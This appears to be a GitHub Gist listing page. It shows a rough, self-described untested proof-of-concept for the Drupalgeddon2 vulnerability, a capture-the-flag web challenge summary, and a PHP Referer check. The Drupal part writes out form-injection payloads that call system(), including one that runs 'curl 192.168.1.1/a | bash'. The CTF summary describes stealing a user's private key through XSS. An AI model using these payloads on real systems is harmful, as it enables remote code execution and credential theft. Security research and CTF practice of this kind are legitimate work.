
@bigshebang
bigshebang / drupalgeddon2
Last active March 30, 2018 13:44
Attempting to make a poc for drupalgeddon2 (CVE-2018-7600 | SA-CORE-2018-002)
UNTESTED, just throwing around ideas
Code: $form['#validate'][] = function(){return system('id');};
Added as a param (unencoded): example.com/login.php?#validate[]=function(){return system('id');};
(BROKEN) URL Encoded: example.com%2Flogin.php%3F%23%24form%5B%27%23validate%27%5D%5B%5D%3Dfunction%28%29%7Breturn%20system%28%27id%27%29%3B%7D%3B
(BROKEN) To make things more fun (execute curl 192.168.1.1/a | bash): example.com%2Flogin.php%3F%23%24form%5B%27%23validate%27%5D%5B%5D%3Dfunction%28%29%7Breturn%20system%28%27curl%20192.168.1.1%2Fa%20%7C%20bash%27%29%3B%7D%3B
This is closer to working, still doesn't work though: curl -i -X POST -H "application/x-www-form-urlencoded" -d "name=admin&pass=adminz&form_id=user_login_block&op=Log+in&%23validate%5B%5D=function%28%29%7Breturn%20system%28%27sleep%2010%22%27%29%3B%7D%3B" "http://example.com/?q=node&destination=node"

Web 500 (Cachet)

Scenario

We need you. Things have been crazy with all the leaks lately. Apparently somebody gave one of our clients a tip that Julian Assange has acquired some devastating data about the US government. Our client has asked us to get this data for them. They're saying they can sell this data and make lots of money off of it or something. Doesn't matter, they're paying us as long as we can get the data for them. The only tip we have is that Julian has been using this new security and privacy focused messaging app called Cachet to communicate with the source of the leaked data. He's supposedly taken a liking to it and uses it pretty frequently. Our interns looked at it but haven't had any luck, so we need your expertise on this one.

TL;DR solution

Get XSS on user julianassange via the enc-msg POST param when sending him a message. Use this XSS to get his private key and passphrase (julianassange reads all messages sent to him). Then use this XSS to read the read.php for julianassange,

@bigshebang
bigshebang / referer_check.php
Last active November 21, 2016 06:41
legit referer check
function referer_good($id)
{
    // if id isn't numeric it can't be valid
    if (!is_numeric($id))
        return false;
    $referer = "";
    if (!empty($_SERVER['HTTP_REFERER']))
        $referer = strtolower($_SERVER['HTTP_REFERER']);
    else
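The gist preview above is cut off, so as an added example (not the gist's own code) here is a complete Referer check in the same shape that fails closed when the header is absent, parses the URL instead of substring-matching it, and compares the host exactly against an allow-list; the allow-list, the HTTPS-only rule and the referer_good_strict() wrapper are assumptions for illustration.

```php
<?php
// Added example, not the gist's code. The allow-list, the HTTPS-only rule and
// the wrapper name are assumptions made for illustration.

/**
 * Return true only when the request carries a Referer whose scheme and host
 * match one of our own origins. A missing or unparsable Referer is rejected:
 * a permissive "no header means OK" branch is the usual mistake here, since
 * a cross-site page can simply suppress the header (e.g. via a referrer policy).
 */
function referer_is_trusted(array $server, array $allowed_hosts): bool
{
    if (empty($server['HTTP_REFERER'])) {
        return false; // fail closed
    }
    $parts = parse_url($server['HTTP_REFERER']);
    if ($parts === false || empty($parts['host']) || empty($parts['scheme'])) {
        return false; // unparsable or relative value: treat as untrusted
    }
    if (strtolower($parts['scheme']) !== 'https') {
        return false; // assumption: only our own TLS origins are trusted
    }
    // Exact, case-insensitive host match. A test such as
    // strpos($referer, 'example.com') !== false would also accept
    // example.com.evil.test or evil.test/?example.com.
    return in_array(strtolower($parts['host']), $allowed_hosts, true);
}

/** Wrapper in the shape of the gist's referer_good(): non-numeric ids fail too. */
function referer_good_strict($id, array $server): bool
{
    if (!is_numeric($id)) {
        return false;
    }
    $allowed_hosts = ['example.com', 'www.example.com']; // constructed allow-list
    return referer_is_trusted($server, $allowed_hosts);
}

// Constructed requests for a quick self-check: only the first should pass.
var_dump(referer_good_strict('42', ['HTTP_REFERER' => 'https://www.example.com/edit?id=42']));
var_dump(referer_good_strict('42', ['HTTP_REFERER' => 'https://example.com.evil.test/x']));
var_dump(referer_good_strict('42', ['HTTP_REFERER' => 'http://example.com/']));
var_dump(referer_good_strict('42', []));
var_dump(referer_good_strict('42abc', ['HTTP_REFERER' => 'https://example.com/']));
```

Passing $_SERVER in as a parameter rather than reading the superglobal inside keeps the check unit-testable with constructed requests like the ones above.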